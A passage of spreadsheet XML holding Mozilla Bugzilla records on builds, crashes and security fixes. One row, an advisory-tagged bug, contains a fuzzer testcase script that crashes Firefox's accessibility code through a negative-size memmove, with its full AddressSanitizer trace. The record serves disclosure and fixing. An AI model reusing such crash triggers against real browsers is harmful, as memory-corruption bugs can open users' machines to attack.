        <v>3</v>
      </c>
      <c r="H3402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3402" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3402" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3402" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L3402" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3402" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3402" t="inlineStr"/>
      <c r="Q3402" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3402" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3402" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3402" t="n">
        <v>1</v>
      </c>
      <c r="U3402" t="n">
        <v>0</v>
      </c>
      <c r="V3402" t="n">
        <v>17</v>
      </c>
      <c r="W3402" t="inlineStr">
        <is>
          <t>This failure just started appearing as of this try run on Windows debug only:
https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=9a40f6566e7f7f8118fd6678a6bfa1d106e0fa5d&amp;selectedJob=197903546
GECKO(3536) | Assertion failure: *outlen == 0, at z:/build/build/src/security/nss/lib/freebl/ctr.c:225
Bug 1465251 is the first patch where we actually call PrioEncoder.encode() during tests, so not totally surprising, but I am having trouble figuring out exactly what this assertion means:
https://searchfox.org/mozilla-central/rev/a41fd8cb947266ea2e3f463fc6e31c88bfab9d41/security/nss/lib/freebl/ctr.c#225
Looks like it's in some pretty low-level code, having trouble debugging this myself :)</t>
        </is>
      </c>
      <c r="X3402" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3403">
      <c r="A3403" t="n">
        <v>173833</v>
      </c>
      <c r="B3403" t="inlineStr">
        <is>
          <t>2002-10-10 16:21:38 -0700</t>
        </is>
      </c>
      <c r="C3403" t="inlineStr">
        <is>
          <t>Update Mac Installer for Mozilla 1.0.2</t>
        </is>
      </c>
      <c r="D3403" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3403" t="n">
        <v>1</v>
      </c>
      <c r="F3403" t="n">
        <v>1</v>
      </c>
      <c r="G3403" t="n">
        <v>2</v>
      </c>
      <c r="H3403" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3403" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3403" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K3403" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3403" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3403" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3403" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3403" t="inlineStr"/>
      <c r="Q3403" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3403" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3403" t="inlineStr">
        <is>
          <t>mozilla1.0.2</t>
        </is>
      </c>
      <c r="T3403" t="n">
        <v>1</v>
      </c>
      <c r="U3403" t="n">
        <v>0</v>
      </c>
      <c r="V3403" t="n">
        <v>9</v>
      </c>
      <c r="W3403" t="inlineStr">
        <is>
          <t>Update mozilla/xpinstall/wizard/mac/macbuild/config.ini_tmpl
and mozilla/xpinstall/wizard/mac/rsrc/Mozilla.rsrc to Mozilla 1.0.2
Need to land on MOZILLA_1_0_BRANCH</t>
        </is>
      </c>
      <c r="X3403" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3404">
      <c r="A3404" t="n">
        <v>422739</v>
      </c>
      <c r="B3404" t="inlineStr">
        <is>
          <t>2008-03-13 12:07:59 -0700</t>
        </is>
      </c>
      <c r="C3404" t="inlineStr">
        <is>
          <t>talos errors need to be correctly reported to the waterfall.</t>
        </is>
      </c>
      <c r="D3404" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3404" t="n">
        <v>1</v>
      </c>
      <c r="F3404" t="n">
        <v>1</v>
      </c>
      <c r="G3404" t="n">
        <v>5</v>
      </c>
      <c r="H3404" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3404" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3404" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3404" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3404" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3404" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3404" t="inlineStr"/>
      <c r="Q3404" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3404" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3404" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3404" t="n">
        <v>1</v>
      </c>
      <c r="U3404" t="n">
        <v>0</v>
      </c>
      <c r="V3404" t="n">
        <v>7</v>
      </c>
      <c r="W3404" t="inlineStr">
        <is>
          <t>When talos catches an error (browser crash, frozen browser, etc) it cleans up and reports an error.  That error doesn't make it onto the waterfall and the machine stays green.
For an example of this see bug 422438.  
Errors that talos has caught needs to be correctly reported and the machine needs to go red (or orange, or some color that isn't green).</t>
        </is>
      </c>
      <c r="X3404" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3405">
      <c r="A3405" t="n">
        <v>1347075</v>
      </c>
      <c r="B3405" t="inlineStr">
        <is>
          <t>2017-03-14 01:36:50 -0700</t>
        </is>
      </c>
      <c r="C3405" t="inlineStr">
        <is>
          <t>negative size memmove in mozilla::a11y::Accessible::InsertChildAt</t>
        </is>
      </c>
      <c r="D3405" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:33 -0700</t>
        </is>
      </c>
      <c r="E3405" t="n">
        <v>1</v>
      </c>
      <c r="F3405" t="n">
        <v>1</v>
      </c>
      <c r="G3405" t="n">
        <v>3</v>
      </c>
      <c r="H3405" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3405" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3405" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K3405" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3405" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3405" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3405" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3405" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q3405" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3405" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3405" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3405" t="n">
        <v>1</v>
      </c>
      <c r="U3405" t="n">
        <v>0</v>
      </c>
      <c r="V3405" t="n">
        <v>35</v>
      </c>
      <c r="W3405" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (BuildID=20170313233726).
&lt;script&gt;
function start() {
	fuzzPriv.enableAccessibility();
	o2=document.createElement('iframe');
	document.body.appendChild(o2);
	o51=document.body;
	o151=document.createElement('iframe');
	o233=(new DOMParser()).parseFromString("&lt;div&gt;&lt;div&gt;","text/html");
	o236=o233.all[2];
	o256=o233.all[3];
	o256.appendChild(o51);
	document.replaceChild(o233.documentElement,document.documentElement);
	document.documentElement.appendChild(o151);
	o151.contentWindow.onresize=fun0;
	document.documentElement.replaceWith(o236,"x");
}
function fun0 () {
	document.documentElement.appendChild(o256);
	o51.innerHTML="&lt;marquee&gt;&gt;&lt;p&gt;&lt;ul id='id56'&gt;";
	document.documentElement.setAttribute('aria-owns','id56');
	setTimeout("location.reload()", 100);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==1262==ERROR: AddressSanitizer: negative-size-param: (size=-8)
    #0 0x49beeb in __asan_memmove /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425:3
    #1 0x7f9e4c384d50 in MoveOverlappingRegion /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:620:5
    #2 0x7f9e4c384d50 in ShiftData&lt;nsTArrayInfallibleAllocator&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:272
    #3 0x7f9e4c384d50 in InsertElementAt&lt;mozilla::a11y::Accessible *&amp;, nsTArrayInfallibleAllocator&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2064
    #4 0x7f9e4c384d50 in mozilla::a11y::Accessible::InsertChildAt(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2113
    #5 0x7f9e4c3a6d42 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2239:3
    #6 0x7f9e4c3a563b in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray&lt;RefPtr&lt;mozilla::a11y::Accessible&gt; &gt;*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2184:5
    #7 0x7f9e4c3a50cc in mozilla::a11y::DocAccessible::ValidateARIAOwned() /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2027:7
    #8 0x7f9e4c30d0ab in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:790:3
    #9 0x7f9e49ba72e8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1863:7
    #10 0x7f9e49bb17fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2159:5
    #11 0x7f9e45305eb7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
    #12 0x7f9e453edc80 in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:588:7
    #13 0x7f9e4472cfeb in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1547:20
    #14 0x7f9e4406cdb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
    #15 0x7f9e440692a9 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
    #16 0x7f9e4406b924 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
    #17 0x7f9e4406bf6e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
    #18 0x7f9e432661b2 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #19 0x7f9e43262a60 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #20 0x7f9e44074cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #21 0x7f9e43fe68c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #22 0x7f9e43fe68c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #23 0x7f9e43fe68c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #24 0x7f9e494d2bcf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #25 0x7f9e4cd13467 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:12
    #26 0x7f9e43fe68c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #27 0x7f9e43fe68c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #28 0x7f9e43fe68c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #29 0x7f9e4cd12e69 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:7
    #30 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #31 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #32 0x7f9e5e72082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #33 0x41c3d8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c3d8)
0x6030002fc788 is located 24 bytes inside of 32-byte region [0x6030002fc770,0x6030002fc790)
allocated by thread T0 (Web Content) here:
    #0 0x4b319e in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e136d in moz_xrealloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7f9e4302fa16 in Realloc /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:211:12
    #3 0x7f9e4302fa16 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7f9e4c384c5b in AppendElement&lt;mozilla::a11y::Accessible *&amp;, nsTArrayInfallibleAllocator&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2116:32
    #5 0x7f9e4c384c5b in mozilla::a11y::Accessible::InsertChildAt(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2109
    #6 0x7f9e4c3a6d42 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2239:3
    #7 0x7f9e4c3a563b in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray&lt;RefPtr&lt;mozilla::a11y::Accessible&gt; &gt;*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2184:5
    #8 0x7f9e4c3a50cc in mozilla::a11y::DocAccessible::ValidateARIAOwned() /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2027:7
    #9 0x7f9e4c30d0ab in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:790:3
    #10 0x7f9e49ba72e8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1863:7
    #11 0x7f9e49bb17fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2159:5
    #12 0x7f9e45305eb7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
    #13 0x7f9e453edc80 in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:588:7
    #14 0x7f9e4472cfeb in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1547:20
    #15 0x7f9e4406cdb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
    #16 0x7f9e440692a9 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
    #17 0x7f9e4406b924 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
    #18 0x7f9e4406bf6e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
    #19 0x7f9e432661b2 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #20 0x7f9e43262a60 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #21 0x7f9e44074cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #22 0x7f9e43fe68c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #23 0x7f9e43fe68c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #24 0x7f9e43fe68c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #25 0x7f9e494d2bcf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #26 0x7f9e4cd13467 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:12
    #27 0x7f9e43fe68c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #28 0x7f9e43fe68c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f9e43fe68c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f9e4cd12e69 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:7
    #31 0x4e01b6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #32 0x4e01b6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #33 0x7f9e5e72082f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: negative-size-param /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425:3 in __asan_memmove
==1262==ABORTING</t>
        </is>
      </c>
      <c r="X3405" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3406">
      <c r="A3406" t="n">
        <v>1353352</v>
      </c>
      <c r="B3406" t="inlineStr">
        <is>
          <t>2017-04-04 06:00:42 -0700</t>
        </is>
      </c>
      <c r="C3406" t="inlineStr">
        <is>
          <t>[wasm] Crash [@ memcpy] or Assertion failure: pool_.numEntries() == 0, at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:712</t>
        </is>
      </c>
      <c r="D3406" t="inlineStr">
        <is>
          <t>2017-06-28 11:03:46 -0700</t>
        </is>
      </c>
      <c r="E3406" t="n">
        <v>1</v>
      </c>
      <c r="F3406" t="n">
        <v>1</v>
      </c>
      <c r="G3406" t="n">
        <v>3</v>
      </c>
      <c r="H3406" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3406" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3406" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3406" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3406" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3406" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3406" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q3406" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3406" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3406" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3406" t="n">
        <v>1</v>
      </c>
      <c r="U3406" t="n">
        <v>0</v>
      </c>
      <c r="V3406" t="n">
        <v>16</v>
      </c>
      <c r="W3406" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 891981e67948 (build with --32 --enable-debug --enable-more-deterministic --enable-simulator=arm, run with --fuzzing-safe --no-threads --no-baseline --no-ion):
See attachment.
Backtrace:
#0  0x084b0ec0 in js::jit::AssemblerBufferWithConstantPools&lt;1024u, 4u, js::jit::Instruction, js::jit::Assembler, 0u&gt;::size (this=0xffb6508c) at js/src/jit/shared/IonAssemblerBufferWithConstantPools.h:712
#1  js::jit::Assembler::size (this=0xffb64f00) at js/src/jit/arm/Assembler-arm.cpp:1412
#2  0x089644f8 in js::wasm::ModuleGenerator::finishCodegen (this=0xffb64a34) at js/src/wasm/WasmGenerator.cpp:530
#3  0x0897dcc3 in js::wasm::ModuleGenerator::finish (this=0xffb64a34, bytecode=...) at js/src/wasm/WasmGenerator.cpp:1108
#4  0x089268ff in js::wasm::Compile (bytecode=..., args=..., error=0xffb65734) at js/src/wasm/WasmCompile.cpp:134
/snip
For detailed crash information, see attachment.</t>
        </is>
      </c>
      <c r="X3406" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3407">
      <c r="A3407" t="n">
        <v>282105</v>
      </c>
      <c r="B3407" t="inlineStr">
        <is>
          <t>2005-02-13 00:12:09 -0800</t>
        </is>
      </c>
      <c r="C3407" t="inlineStr">
        <is>
          <t>[FIX]BoxObject's InvalidatePresentationStuff needs ability to tell document to remove it from its boxobject table</t>
        </is>
      </c>
      <c r="D3407" t="inlineStr">
        <is>
          <t>2008-09-26 17:59:10 -0700</t>
        </is>
      </c>
      <c r="E3407" t="n">
        <v>1</v>
      </c>
      <c r="F3407" t="n">
        <v>1</v>
      </c>
      <c r="G3407" t="n">
        <v>3</v>
      </c>
      <c r="H3407" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3407" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3407" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K3407" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3407" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3407" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3407" t="inlineStr">
        <is>
          <t>[sg:critical] [no l10n impact][rft-dl]</t>
        </is>
      </c>
      <c r="Q3407" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3407" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3407" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3407" t="n">
        <v>1</v>
      </c>
      <c r="U3407" t="n">
        <v>0</v>
      </c>
      <c r="V3407" t="n">
        <v>33</v>
      </c>
      <c r="W3407" t="inlineStr">
        <is>
          <t>We can get into situations where an element's box object becomes useless because
of some sequence of events like this: frames are destroyed (e.g. in response to
opacity changes (?)), InvalidatePresentationStuff is called on the box object in
question, but the document still holds it in its boxobject table, so that when
script attempts to subsequently access boxobject methods, the busted boxobject
with null mPresShell etc is used, and none of the methods work. 
This was noted in earlier testing versions of my new prefwindow where I had a
listbox and was attempting to access properties on it after the pane was faded in. 
The solution appears to be that in some cases when InvalidatePresentationStuff
is called, we want to tell the document to take it out of the boxobject table,
which is what this patch does. See also the patch in 282103, which updates the
call sites in nsXULDocument.</t>
        </is>
      </c>
      <c r="X3407" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3408">
      <c r="A3408" t="n">
        <v>1230668</v>
      </c>
      <c r="B3408" t="inlineStr">
        <is>
          <t>2015-12-04 13:01:31 -0800</t>
        </is>
      </c>
      <c r="C3408" t="inlineStr">
        <is>
          <t>Heap-use-after-free [@ nsStyleContext::~nsStyleContext]</t>
        </is>
      </c>
      <c r="D3408" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:49 -0700</t>
        </is>
      </c>
      <c r="E3408" t="n">
        <v>1</v>
      </c>
      <c r="F3408" t="n">
        <v>1</v>
      </c>
      <c r="G3408" t="n">
        <v>3</v>
      </c>
      <c r="H3408" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3408" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3408" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3408" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3408" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3408" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3408" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3408" t="inlineStr">
        <is>
          <t>[adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q3408" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3408" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3408" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T3408" t="n">
        <v>1</v>
      </c>
      <c r="U3408" t="n">
        <v>0</v>
      </c>
      <c r="V3408" t="n">
        <v>24</v>
      </c>
      <c r="W3408" t="inlineStr">
        <is>
          <t>Created attachment 8696041
testcase (may crash Firefox)</t>
        </is>
      </c>
      <c r="X3408" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3409">
      <c r="A3409" t="n">
        <v>1127206</v>
      </c>
      <c r="B3409" t="inlineStr">
        <is>
          <t>2015-01-28 22:59:56 -0800</t>
        </is>
      </c>
      <c r="C3409" t="inlineStr">
        <is>
          <t>Crash when using certain File() constructors on workers</t>
        </is>
      </c>
      <c r="D3409" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3409" t="n">
        <v>1</v>
      </c>
      <c r="F3409" t="n">
        <v>1</v>
      </c>
      <c r="G3409" t="n">
        <v>3</v>
      </c>
      <c r="H3409" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3409" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3409" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3409" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L3409" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3409" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3409" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3409" t="inlineStr">
        <is>
